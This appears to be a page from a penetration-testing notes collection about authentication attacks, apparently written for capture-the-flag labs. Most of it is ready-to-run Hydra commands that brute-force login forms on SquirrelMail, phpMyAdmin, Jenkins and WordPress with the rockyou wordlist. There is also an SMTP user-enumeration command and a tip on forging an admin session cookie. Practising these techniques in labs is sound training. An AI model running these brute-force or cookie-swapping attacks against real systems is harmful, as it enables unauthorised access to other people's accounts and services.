Authentication

Login Brute-Forcing

Hydra Examples

hydra -l <USER> -P /root/<PASSLIST>.txt http://<IP> http-post-form "/squirrelmail/src/redirect.php:login_username=^USER^&secretkey=^PASS^&js_autodetect_results=1&just_logged_in=1: Unknown user or password incorrect."
hydra -l admin -P /root/Downloads/rockyou.txt 192.168.56.133 http-post-form "/phpmyadmin/index.php: set_session=sikcnhqfsi4q8vjf92l48evuds&pma_username=^USER^&pma_password=^PASS^&server=1&target=index.php&lang=en&token=703e4c7e7f67592c2556657c2d68525f: Cannot log in to the MySQL server"
hydra -l admin -P /root/Downloads/rockyou.txt -s 8080 192.168.56.135 http-post-form '/login?from=%2Fadmin:j_username=admin&j_password=^PASS^&from=%2Fadmin&Submit=Sign+in:Invalid username or password.'
hydra -l kwheel -P rockyou.txt blog.thm http-post-form "/wp-login.php:log=^USER^&pwd=^PASS^&wp-submit=Log+In&redirect_to=http%3A%2F%2Fblog.thm%2Fwp-admin%2F&testcookie=1:F=The password you entered for the username"
hydra -l wpadmin -P rockyou.txt tartarsauce.htb http-post-form "/webservices/wp/wp-login.php:log=^USER^&pwd=^PASS^&wp-submit=Log+In&redirect_to=http%3A%2F%2Ftartarsauce.htb%2Fwebservices%2Fwp%2Fwp-admin%2F&testcookie=1:F=The password you entered for the username"
 
hydra smtp-enum://10.10.10.51:25/rcpt -L "/usr/share/seclists/Usernames/top-usernames-shortlist.txt" -o "/root/HTB/Linux/SolidState/results/10.10.10.51/scans/tcp25/tcp_25_smtp_user-enum_hydra_rcpt.txt" -p solidstate

Weak Authentication

  • Sometimes you can swap the cookie from your low level user to admin

    • See Dibble where the user/admin cookie was literally base64 default/admin

PreviousXSSNextAdministrative Portals

Last updated